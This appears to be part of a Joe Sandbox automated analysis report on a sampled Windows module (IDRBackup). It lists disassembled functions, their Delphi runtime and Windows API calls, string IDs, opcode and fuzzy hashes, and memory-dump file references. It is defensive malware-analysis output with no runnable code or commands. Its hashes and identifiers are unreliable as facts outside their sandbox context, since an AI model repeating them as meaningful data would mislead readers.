                                                                                                  • Opcode Fuzzy Hash: c164c85c6bd618db57c2144687f5cfb642152b2fc34a6d7309f96ec3fd8f8499
                                                                                                  • Instruction Fuzzy Hash: 56E0CD286083C112FB8056F028397DF17C30BB1584FC4038AEF54471D3C67A68055346
                                                                                                  Function 50005124 Relevance: 6.0, APIs: 4, Instructions: 20fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@SetInOutRes$qqri.RTL120 ref: 5000513C
                                                                                                  • DeleteFileW.KERNEL32(?), ref: 50005147
                                                                                                  • GetLastError.KERNEL32(?), ref: 50005150
                                                                                                  • @System@SetInOutRes$qqri.RTL120(?), ref: 50005155
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Res$qqriSystem@$DeleteErrorFileLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 2381681663-0
                                                                                                  • Opcode ID: f50552c7c8a8d1e0cbec7b417928886d24a38268f93fe67ec141b2c984adff18
                                                                                                  • Instruction ID: bb7ad3ba53af60b48c6de9ba25e781b0205e3d77af95161216580be110d8d8b4
                                                                                                  • Opcode Fuzzy Hash: f50552c7c8a8d1e0cbec7b417928886d24a38268f93fe67ec141b2c984adff18
                                                                                                  • Instruction Fuzzy Hash: 1CD05EE964308082FF443AE8E4B17C661998F54213FC842A3BD4489187F72DCAD195B5
                                                                                                  Function 50003A58 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@FillChar$qqrpvib.RTL120 ref: 50003A6A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Char$qqrpvibFillSystem@@
                                                                                                  • String ID: <JP$jP
                                                                                                  • API String ID: 4121559260-1976356052
                                                                                                  • Opcode ID: 1df4666b6065bb4c860eebf29b90c5e0bf618a6166f25d08af580d2d2a1666dc
                                                                                                  • Instruction ID: 29e72c1258d551b32b7b75072670d586078dfe44cbfcda950a95c9ee85119c78
                                                                                                  • Opcode Fuzzy Hash: 1df4666b6065bb4c860eebf29b90c5e0bf618a6166f25d08af580d2d2a1666dc
                                                                                                  • Instruction Fuzzy Hash: 46416D71604B41CFE361DFADD89470AB7E0EF94228F44CB2EE589CB652E734E8448B46
                                                                                                  Function 50003838 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@FillChar$qqrpvib.RTL120 ref: 5000384A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Char$qqrpvibFillSystem@@
                                                                                                  • String ID: <JP$jP
                                                                                                  • API String ID: 4121559260-1976356052
                                                                                                  • Opcode ID: 36264c1cf101ac4c8ec33a34441a950c0984b743827c9545f83337dbb8638ebb
                                                                                                  • Instruction ID: 0b5a206ebe67b66b8e3c020c356c1e6d665bc0067f7b04b9bcba261746849486
                                                                                                  • Opcode Fuzzy Hash: 36264c1cf101ac4c8ec33a34441a950c0984b743827c9545f83337dbb8638ebb
                                                                                                  • Instruction Fuzzy Hash: 60319071605B818FE366CFADD894749B7E8FF50624F94C369E5588B252DB70EC01CB81
                                                                                                  Function 50021580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@FPower10$qqrv.RTL120 ref: 50021606
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Power10$qqrvSystem@
                                                                                                  • String ID: +$-
                                                                                                  • API String ID: 140778524-2137968064
                                                                                                  • Opcode ID: 32b8098c721a4e46187648da88f365d788b2412693a4c3184540e22e5d6e62b9
                                                                                                  • Instruction ID: 331eab40c37fd92a1dba551ef5550b3055afbfd15106153d872e105f9a111e51
                                                                                                  • Opcode Fuzzy Hash: 32b8098c721a4e46187648da88f365d788b2412693a4c3184540e22e5d6e62b9
                                                                                                  • Instruction Fuzzy Hash: 8B21C910E0B0D76EE72016A8F8487DEBFE59F31620F6C0B9BD8C483243D9308D828790
                                                                                                  Function 50021408 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@FPower10$qqrv.RTL120(00000000,00000000,?,00000000), ref: 5002148D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Power10$qqrvSystem@
                                                                                                  • String ID: +$-
                                                                                                  • API String ID: 140778524-2137968064
                                                                                                  • Opcode ID: cf31913889536f98ca9fe7bf4674e760db0a12c29d842ff9dc99d359c51be7e3
                                                                                                  • Instruction ID: fa1cfcb7d4169ee6ed92dfde316ec9fe3663952840befaa7f587ccd8d0985425
                                                                                                  • Opcode Fuzzy Hash: cf31913889536f98ca9fe7bf4674e760db0a12c29d842ff9dc99d359c51be7e3
                                                                                                  • Instruction Fuzzy Hash: F5110211E0B0C769E72136A5F8407DEBBE5AB71724F6C0B9BD4CC86242D9298E8287D0
                                                                                                  Function 50004610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000467A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Length$qqrr20StringiSystem@System@@Unicode
                                                                                                  • String ID: $"
                                                                                                  • API String ID: 1238308113-3817095088
                                                                                                  • Opcode ID: 3740d5a8882292424296d33065260b11a727ea2989f92afca789f2fadf23aca0
                                                                                                  • Instruction ID: a4110a0b3ab76dcf93db08b7b91ce8b4ca9335338cd7ea686d5f75d583f17b04
                                                                                                  • Opcode Fuzzy Hash: 3740d5a8882292424296d33065260b11a727ea2989f92afca789f2fadf23aca0
                                                                                                  • Instruction Fuzzy Hash: B211E9C3E011A085F7B42700D8322E722E2EB93B517EA0356CC80CB656F2A34C91D55F
                                                                                                  Function 50028BD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetThreadLocale.KERNEL32 ref: 50028BF6
                                                                                                  • GetSystemMetrics.USER32(0000004A), ref: 50028C47
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LocaleMetricsSystemThread
                                                                                                  • String ID: HlP
                                                                                                  • API String ID: 3035471613-2947359988
                                                                                                  • Opcode ID: b0f5541512791debc26a8671445bd5c5934f552fcd55d97c6b110629674566dc
                                                                                                  • Instruction ID: 10459d71cf64cf038303f9a9cea68570e56e651b364d0c8a3b35f290a598fd13
                                                                                                  • Opcode Fuzzy Hash: b0f5541512791debc26a8671445bd5c5934f552fcd55d97c6b110629674566dc
                                                                                                  • Instruction Fuzzy Hash: 9A012D741072D28EEB108F65F88536277E89B51254F24C2ABDD489F287DB39C846C7B5
                                                                                                  Function 5001BB80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,GetFileAttributesExW), ref: 5001BB8D
                                                                                                    • Part of subcall function 5000E884: GetProcAddress.KERNEL32(?,?), ref: 5000E8A8
                                                                                                    • Part of subcall function 5000E884: @System@@LStrClr$qqrpv.RTL120(5000E8EE,?,?,00000000), ref: 5000E8E1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressClr$qqrpvHandleModuleProcSystem@@
                                                                                                  • String ID: GetFileAttributesExW$kernel32.dll
                                                                                                  • API String ID: 3679075934-3171891112
                                                                                                  • Opcode ID: 33b27a9e80b64f9f74edf5c1de5c6d6a4e39c05bd2065b4b5f612ff5d03c5c33
                                                                                                  • Instruction ID: e514f51dd8fb537dfb01239488a6553f3399445b9a4cbebaef623d1d0cc912b9
                                                                                                  • Opcode Fuzzy Hash: 33b27a9e80b64f9f74edf5c1de5c6d6a4e39c05bd2065b4b5f612ff5d03c5c33
                                                                                                  • Instruction Fuzzy Hash: 3AE04F71445288AFD700EF94ED44FAA379CBB98210F408D0BF60987510CB74D482CBA0
                                                                                                  Function 50005D60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@RewritText$qqrr15System@TTextRec.RTL120(?,50005E83), ref: 50005D80
                                                                                                  • @System@SetInOutRes$qqri.RTL120(?,50005E83), ref: 50005D99
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Res$qqriRewritSystem@@TextText$qqrr15
                                                                                                  • String ID: 0CP
                                                                                                  • API String ID: 2995044334-842509658
                                                                                                  • Opcode ID: 307c06a35ed04e922cfdbbcf6000164576624c71684b84ee2fc310da7f03048e
                                                                                                  • Instruction ID: eabc5bede8330fcccc3b4369240e300fe8af7b4666d213e9db6d5ee23a722cab
                                                                                                  • Opcode Fuzzy Hash: 307c06a35ed04e922cfdbbcf6000164576624c71684b84ee2fc310da7f03048e
                                                                                                  • Instruction Fuzzy Hash: A8D02B453073C08AFB206FF438E010482A05F88002784CB67EC45CB247E569C9405326
                                                                                                  Function 50005454 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@ResetText$qqrr15System@TTextRec.RTL120(?,5000549E,?,500050BF), ref: 5000546C
                                                                                                  • @System@SetInOutRes$qqri.RTL120(?,5000549E,?,500050BF), ref: 50005485
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Res$qqriResetSystem@@TextText$qqrr15
                                                                                                  • String ID: `@P
                                                                                                  • API String ID: 3749152163-4219215009
                                                                                                  • Opcode ID: 474c6b335946cc709f9bfe439fa6d2f0613b7dda503e967d2b86d165faebaa74
                                                                                                  • Instruction ID: 3488a2e08867437c2cb3a72290a42c38b3174c830ac736cddd9b2ab7f76a7471
                                                                                                  • Opcode Fuzzy Hash: 474c6b335946cc709f9bfe439fa6d2f0613b7dda503e967d2b86d165faebaa74
                                                                                                  • Instruction Fuzzy Hash: B8D05E897472D08ABB40AFF828F029495A05B48152B84D667FD84CB253E659CA549365